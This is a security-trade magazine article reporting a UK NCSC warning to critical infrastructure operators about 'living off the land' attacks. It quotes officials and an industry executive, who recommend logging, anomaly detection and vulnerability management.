‘Living Off The Land’ guidance

by Mark Rowe

Cyber attackers may use sophisticated techniques to camouflage their activity on victims’ networks, says the UK official National Cyber Security Centre in a warning to UK critical infrastructure operators.

Threat actors have been exploiting native tools and processes built into computer systems to gain persistent access and avoid detection, says the NCSC. This kind of tradecraft, known as ‘living off the land’, allows attackers to operate discreetly, with malicious activity blending in with legitimate system and network behaviour making it difficult to differentiate – even by organisations with more mature security postures.

The NCSC assesses it is likely this type of activity poses a threat to UK critical national infrastructure and so all providers are urged to follow the recommended actions to help detect compromises and mitigate vulnerabilities. See the United States federal CISA website for new ‘Identifying and Mitigating Living Off The Land’ guidance.

Paul Chichester, NCSC Director of Operations, said: “It is vital that operators of UK critical infrastructure heed this warning about cyber attackers using sophisticated techniques to hide on victims’ systems. Threat actors left to carry out their operations undetected present a persistent and potentially very serious threat to the provision of essential services.

“Organisations should apply the protections set out in the latest guidance to help hunt down and mitigate any malicious activity found on their networks.”


Sylvain Cortes, VP Strategy, Hackuity says: “Critical national infrastructure (CNI) remains a priority target for attackers, but the ‘living off the land’ (LOTL) technique, which the NCSC’s latest joint advisory warns of, seems to be on the rise – attackers can move around a network in a similar way to legitimate users. This type of attack poses a significant threat to UK CNI. The attackers’ aim is simple: to cause maximum disruption whilst flying under the radar of detection.

“I strongly advise organisations to apply the defense principles laid out in the latest guidance by the NCSC to target any malicious activity found on their networks, which suggests protection best practices, such as detailed logging of all activity and machine learning automation to review the logs for anomalies. Prevention is always better than cure, so having vulnerability management in place will help teams identify their specific weaknesses and accelerate targeted remediation. And greatly reduce the chances of an unwelcome visitor lurking in the shadows of their network.”

Related News

  • Cyber

    AI arms race

    by Mark Rowe

    Machine learning will likely be equally effective for offensive and defensive purposes (in cyber and kinetic theatres), and hence one may envision…

  • Cyber

    UK cyber census

    by Mark Rowe

    IT and technology companies in the UK have experienced an average of 44 cyberattacks in the last 12 months – put another…

  • Cyber

    Mobile threat landscape

    by Mark Rowe

    Taking advantage of the popularity and volatility of the cryptocurrency landscape is paying off for threat actors via the mobile attack vector…


Subscribe to our weekly newsletter to stay on top of security news and events.

© 2024 Professional Security Magazine. All rights reserved.

Website by MSEC Marketing